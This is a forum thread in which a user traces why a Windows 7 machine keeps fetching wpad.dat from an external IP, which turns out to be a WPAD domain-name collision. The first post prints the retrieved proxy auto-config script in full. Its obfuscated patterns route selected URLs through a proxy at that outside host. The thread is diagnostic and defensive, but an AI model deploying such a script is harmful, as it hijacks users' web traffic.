Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows 7 keeps downloading file from 144.76.184.43?


  • Please log in to reply
2 replies to this topic

#1 OpenFerret

OpenFerret

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:51 AM

Posted 13 January 2016 - 07:11 PM

Hi all,

 

Been alerted by a snort definition (ET Zbot dowload config) that my Windows 7 box keeps connecting to 144.76.184.43 on port 80 and trying to download a file called wpad.dat

 

You can see the file yourself by downloading it from 144.76.184.43/wpad.dat

 

The file contains:

// WpadBlock.com project
// Testing regular expressions
function FindProxyForURL(url, host) {
	if( ( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) || ( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) || ( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) || ( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) || ( ( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ) || ( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) || ( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) || ( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*")) ) || ( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) || ( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) || ( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") ) ) return "PROXY 144.76.184.43:80";
	return "DIRECT";
}

Can anyone tell me if this is an actual trojan?  I've used some if the sysinternal suite to see what program is doing this and its svchost.  Even when I block access to 144.76.184.43 with my firewall, svchost keeps trying different local ports methodically to get the file.


Edited by hamluis, 13 January 2016 - 08:16 PM.
Moved from Win 7 to Am I Infected - Hamluis.


BC AdBot (Login to Remove)

 


#2 OpenFerret

OpenFerret
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:51 AM

Posted 14 January 2016 - 08:28 AM

So, I've disabled the Win HTTP Web Proxy Discovery Service and this has stopped the requests, but pinging wpad in the cmd line still directs to 144.76.184.43 ...

 

I'm hoping that a reboot when I get home will clear the wpad and that I'll no longer keep going to some server in Germany to get it.

 

If anyone can look at the above and tell me what it is doing and why I would be interested to see.



#3 OpenFerret

OpenFerret
  • Topic Starter

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:51 AM

Posted 14 January 2016 - 10:01 AM

Ok, cancel my last!

 

I've resolved the issue and proved to myself yet again what a muppet I can be...

 

So... pfSense router thought its domain name was 'network' and my Windows 7 box was set up to look for proxy settings for some reason?

 

As a result, looking for a legitimate wpad file asked my DNS server (google at 8.8.8.8) where it could find wpad.network, which turns out to be 144.76.184.43

 

Then Windows does what it should and submits a get request from a wpad.dat file which is returned as that file at the top of this post from someone's network...

 

... and then snort kicks off as it meats certain criteria.

 

 

 

Moral of the story, don't set your domain name to a TLD... Make it unique (#networking101).






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users